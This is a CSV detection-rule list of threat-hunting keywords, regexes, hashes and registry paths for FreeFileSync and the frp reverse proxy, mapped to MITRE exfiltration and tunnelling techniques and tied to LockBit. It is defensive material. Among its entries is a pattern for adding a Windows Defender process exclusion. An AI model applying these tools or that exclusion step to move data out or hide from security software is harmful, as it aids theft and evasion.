"*/FreeFileSync.exe*",".{0,1000}\/FreeFileSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSync.tar.gz*",".{0,1000}\/FreeFileSync\.tar\.gz.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSync_*.tar.gz*",".{0,1000}\/FreeFileSync_.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data 
exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSync_*_Windows_Setup.exe*",".{0,1000}\/FreeFileSync_.{0,1000}_Windows_Setup\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSync_x64.exe*",".{0,1000}\/FreeFileSync_x64\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSyncPortable_*.exe*",".{0,1000}\/FreeFileSyncPortable_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/RealTimeSync.exe*",".{0,1000}\/RealTimeSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/tmp/FreeFileSync*",".{0,1000}\/tmp\/FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data 
Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\FreeFileSync\Logs\*",".{0,1000}\\AppData\\Roaming\\FreeFileSync\\Logs\\.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Uninstall\FreeFileSync_is1*",".{0,1000}\\CurrentVersion\\Uninstall\\FreeFileSync_is1.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Uninstall\FreeFileSync_is1*",".{0,1000}\\CurrentVersion\\Uninstall\\FreeFileSync_is1.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\FreeFileSync.exe*",".{0,1000}\\FreeFileSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\FreeFileSync\Logs\*",".{0,1000}\\FreeFileSync\\Logs\\.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data 
Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\FreeFileSync_*_Windows_Setup.exe*",".{0,1000}\\FreeFileSync_.{0,1000}_Windows_Setup\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\FreeFileSync_x64.exe*",".{0,1000}\\FreeFileSync_x64\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\FreeFileSyncPortable_*.exe*",".{0,1000}\\FreeFileSyncPortable_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\Program Files\FreeFileSync*",".{0,1000}\\Program\sFiles\\FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\RealTimeSync.exe*",".{0,1000}\\RealTimeSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data 
Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\WOW6432Node\FreeFileSync*",".{0,1000}\\WOW6432Node\\FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A" "*>FreeFileSync - Folder Comparison and Synchronization<*",".{0,1000}\>FreeFileSync\s\-\sFolder\sComparison\sand\sSynchronization\<.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#description","N/A","9","10","N/A","N/A","N/A","N/A" "*>FreeFileSync Setup<*",".{0,1000}\>FreeFileSync\sSetup\<.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#description","N/A","9","10","N/A","N/A","N/A","N/A" "*>FreeFileSync<*",".{0,1000}\>FreeFileSync\<.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A" "*0b0977a047ea3397c83d19f0edeef003c98021a2f64b03503f67a7189aeab4bf*",".{0,1000}0b0977a047ea3397c83d19f0edeef003c98021a2f64b03503f67a7189aeab4bf.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data 
exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A" "*13b6443f4e1f03bc7c37fe9d260435886ad80ee292c0a3b5b9cdeb763576e31b*",".{0,1000}13b6443f4e1f03bc7c37fe9d260435886ad80ee292c0a3b5b9cdeb763576e31b.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A" "*api.freefilesync.org*",".{0,1000}api\.freefilesync\.org.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*c888fa7aadb304362df7bcb43164b6a07222739f5d2a90bf475817aa0e75013d*",".{0,1000}c888fa7aadb304362df7bcb43164b6a07222739f5d2a90bf475817aa0e75013d.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A" "*-Command Add-MpPreference -ExclusionProcess *\Program Files\FreeFileSync\Bin\*",".{0,1000}\-Command\sAdd\-MpPreference\s\-ExclusionProcess\s.{0,1000}\\Program\sFiles\\FreeFileSync\\Bin\\.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data 
Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*fb4d282f8d202006d682eef84a83757376c20929f62626e288a159d730fde3c9*",".{0,1000}fb4d282f8d202006d682eef84a83757376c20929f62626e288a159d730fde3c9.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A" "*https://api.freefilesync.org/new_installation*",".{0,1000}https\:\/\/api\.freefilesync\.org\/new_installation.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*https://freefilesync.org/donate*",".{0,1000}https\:\/\/freefilesync\.org\/donate.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*pkill FreeFileSync*",".{0,1000}pkill\sFreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*pkill RealTimeSync*",".{0,1000}pkill\sRealTimeSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - 
T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*SOFTWARE\WOW6432Node\FreeFileSync*",".{0,1000}SOFTWARE\\WOW6432Node\\FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/frp.git*",".{0,1000}\/frp\.git.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_darwin_amd64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_darwin_arm64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_darwin_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_freebsd_amd64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_freebsd_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT 
or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_linux_amd64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_linux_arm.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_arm\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_linux_arm64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_linux_mips.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mips\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*/frp_0.*.*_linux_mips64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mips64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_linux_mips64le.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mips64le\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frp_0.*.*_linux_mipsle.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mipsle\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frpc.exe*",".{0,1000}\/frpc\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*/frps.exe*",".{0,1000}\/frps\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data 
Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_darwin_amd64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_darwin_arm64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_darwin_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_freebsd_amd64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_freebsd_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_linux_amd64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*\frp_0.*.*_linux_arm.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_arm\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_linux_arm64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_linux_mips.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mips\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_linux_mips64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mips64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_linux_mips64le.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mips64le\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - 
T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frp_0.*.*_linux_mipsle.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_linux_mipsle\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frpc.exe*",".{0,1000}\\frpc\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*\frps.exe*",".{0,1000}\\frps\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*00c526bdfae8fe448b1810c1c06b2827efa1158b7e324aa69c23a57a8b29f603*",".{0,1000}00c526bdfae8fe448b1810c1c06b2827efa1158b7e324aa69c23a57a8b29f603.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*00ffd863c32645660a29db758db4ea89f7c3eb616b3488cceca55345d8a5d11d*",".{0,1000}00ffd863c32645660a29db758db4ea89f7c3eb616b3488cceca55345d8a5d11d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0108697c36c88f6ae776f923064236f4e890f3c887a94e798222e5ba3c08c568*",".{0,1000}0108697c36c88f6ae776f923064236f4e890f3c887a94e798222e5ba3c08c568.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*025bf967e37ce095f31bc45d886156d365a0e9dc7aa0e7f3bbc91bd1c9717145*",".{0,1000}025bf967e37ce095f31bc45d886156d365a0e9dc7aa0e7f3bbc91bd1c9717145.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*02a4baaefa38ed6bed90fd59076be5eceab98f6d08a83aa3b459e160299389e2*",".{0,1000}02a4baaefa38ed6bed90fd59076be5eceab98f6d08a83aa3b459e160299389e2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*02ebe0a81dac898bf7bfced875656ec1f05b4eeaf4ba704c8a2b6c88582026ab*",".{0,1000}02ebe0a81dac898bf7bfced875656ec1f05b4eeaf4ba704c8a2b6c88582026ab.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*030544b09aff990592772ae508a62396c5648a267a14e5f2fad08324c3d9eb9a*",".{0,1000}030544b09aff990592772ae508a62396c5648a267a14e5f2fad08324c3d9eb9a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0314135de58db11f0c6f360113b3f76735e20a7b3cdb928f9acdb0a82ce927e0*",".{0,1000}0314135de58db11f0c6f360113b3f76735e20a7b3cdb928f9acdb0a82ce927e0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*03dae058d9b192aab4e119e620c40253f7693bfae095820ddd0313403d207d82*",".{0,1000}03dae058d9b192aab4e119e620c40253f7693bfae095820ddd0313403d207d82.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*03fce0574a2df7993efff8bf3d1e45250b08692081cff53dfd266745db772f27*",".{0,1000}03fce0574a2df7993efff8bf3d1e45250b08692081cff53dfd266745db772f27.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*042fa197c0f91b27404c086eabfb62dad3ffaaad7101046f518abf58ae42ee1b*",".{0,1000}042fa197c0f91b27404c086eabfb62dad3ffaaad7101046f518abf58ae42ee1b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 